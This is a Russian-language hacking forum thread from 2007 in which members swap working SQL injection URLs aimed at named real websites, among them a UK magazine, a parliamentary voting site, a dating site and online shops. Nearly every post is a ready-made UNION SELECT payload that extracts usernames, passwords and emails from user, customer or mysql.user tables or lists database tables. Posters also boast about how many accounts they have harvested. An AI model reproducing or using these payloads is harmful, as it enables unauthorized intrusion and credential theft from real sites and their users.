ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #521  
Старый 16.02.2007, 01:24
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.starkeith.net/member.php?user_id=-4%20union%20select%201,2,3,4,5,6,7,8/*
Цитата:
http://bartertown.com/ref/index.php?user_id=5 UNION SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13/*
Цитата:
http://www.cgam.nerc.ac.uk/people/people_research.php?user_ID=-5%20UNION%20SELECT%200,1,2,3,4,password,6,7,8,9,10 ,11,12,13,14,15,16,17%20from%20mysql.user/*
Воть
 
Ответить с цитированием

  #522  
Старый 16.02.2007, 01:59
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от Thanat0z  
Если не катит через юнионселект, пробую через ордербай
ИМХО сначала использовать order by так как сокращаешь время подбора но не везде работает.

http://bestposters.ru/main.php?big=-1262+union+select+1,concat(login,char(58),password ,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15+f rom+users+limit+1,1/*
около 20 юзеров, фу бяка даже не интересно

Последний раз редактировалось }{0TT@БЬ)Ч; 16.02.2007 в 04:11..
 
Ответить с цитированием

  #523  
Старый 16.02.2007, 05:36
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

для меня день сегодня не очень удачный в количестве скулей, но очень поучительный в плане ошибок. Сейчас приведу скули, где есть ошибки, с которыми я ранее не сталкивался, и которые так или иначе являются тупиком, или по крайней мере я ничего получить не смог

Код:
__http://www.revolution.co.uk/_forum.php?neuron=3+order+by+14/*
__http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+11/*
__http://www.immunisation.org.uk/article.php?id=-97'+union+select+1,2,3,4,5,6,7,8/*
а кто разгадает это головоломку, тому дам +6
Код:
__http://www.prospect-magazine.co.uk/article_details.php?id=7320')+union+select+1111,2222,3333,4444,555,666/*

и только один удачный

Код:
__http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user,3,4,5,6,7/*

таблицу не смог подобрать, так пробывал...
__http://www.publicwhip.org.uk/policy.php?id=-230+union+select+1,user_name,3,4,5,6,7+from+pw_dyn.user/*
 
Ответить с цитированием

  #524  
Старый 16.02.2007, 06:05
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

Thanat0z, читай больше
Код:
http://www.revolution.co.uk/_forum.php?topic=3766&message=446388+union+select+1,2,3,4,convert(version()+using+latin1),6,7,8,9&neuron=3&page=0
http://www.immunisation.org.uk/article.php?id=997'+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,version(),5,6,7,8,9,0,user(),2,3/*
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #525  
Старый 16.02.2007, 06:10
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Цитата:
Сообщение от c411k  
Thanat0z, читай больше
Код:
http://www.revolution.co.uk/_forum.php?topic=3766&message=446388+union+select+1,2,3,4,convert(version()+using+latin1),6,7,8,9&neuron=3&page=0
http://www.immunisation.org.uk/article.php?id=997'+union+select+1,2,user(),version(),5,6,7,8,9/*
http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,version(),5,6,7,8,9,0,user(),2,3/*
хе в этих кто может и можно вытянуть, а привел я совсем другие Но все равно ты крут
 
Ответить с цитированием

  #526  
Старый 16.02.2007, 09:47
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Thanat0z,c411k,
Код:
http://www.prospect-magazine.co.uk/list.php?subject=48+union+select+1,2,3,concat(email,0x3a,password),5,6,7,8,9,0,1,2,3+from+customers/*
email=login
 
Ответить с цитированием

  #527  
Старый 16.02.2007, 18:04
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

_http://www.bushtorrent.com/pic.php?id=-99+union+select+1,0x6869206d616e20212121,3,4,5,6+f rom+mysql.user/*

хех название таблиц не подобрал, зато название хоста))...тут приручена булка..а у булки название таблицы юзеров какая?

датинг сайт 300 юзеров
_http://www.datenlove.com/pic.php?id=-99+union+select+concat(name,0x3a,password,0x3a,ema il),2+from+users+limit+300,1/*

_http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(username,0x3a,password, 0x3a,email),4+from+eftersnack_users/*
_http://www.112uh.com/image.php?id=-99+union+select+1,2,concat(user,0x3a,pass),4+from+ bf_users/*

но вход в админку только с определённого ип

Последний раз редактировалось злюка; 16.02.2007 в 19:33..
 
Ответить с цитированием

  #528  
Старый 17.02.2007, 00:40
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от злюка  
_http://www.bushtorrent.com/pic.php?id=-99+union+select+1,0x6869206d616e20212121,3,4,5,6+f rom+mysql.user/*
хех название таблиц не подобрал, зато название хоста))...тут приручена булка..а у булки название таблицы юзеров какая?
злюка перебирай
http://www.bushtorrent.com/pic.php?id=-99+union+select+1,concat(username,char(58),passwd) ,3,4,5,6+from+users+limit+1,1/*


мои любимые часики http://www.orient-time.ru/trade/news.php?nid=-25+union+select+1,2,database(),user(),version()/*

Последний раз редактировалось }{0TT@БЬ)Ч; 17.02.2007 в 00:51..
 
Ответить с цитированием

  #529  
Старый 17.02.2007, 03:05
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Код:
http://www.nix.ru/news/pnv.html?id=-99+union+select+table_name,2,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
=\
 
Ответить с цитированием

  #530  
Старый 17.02.2007, 03:12
Аватар для pop_korn
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

http://www.nintek.com.au/x/Scripts/nin_support_faq.asp?cate=-1+UNION+ALL+SELECT+1,table_name+from+information_s chema.tables--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ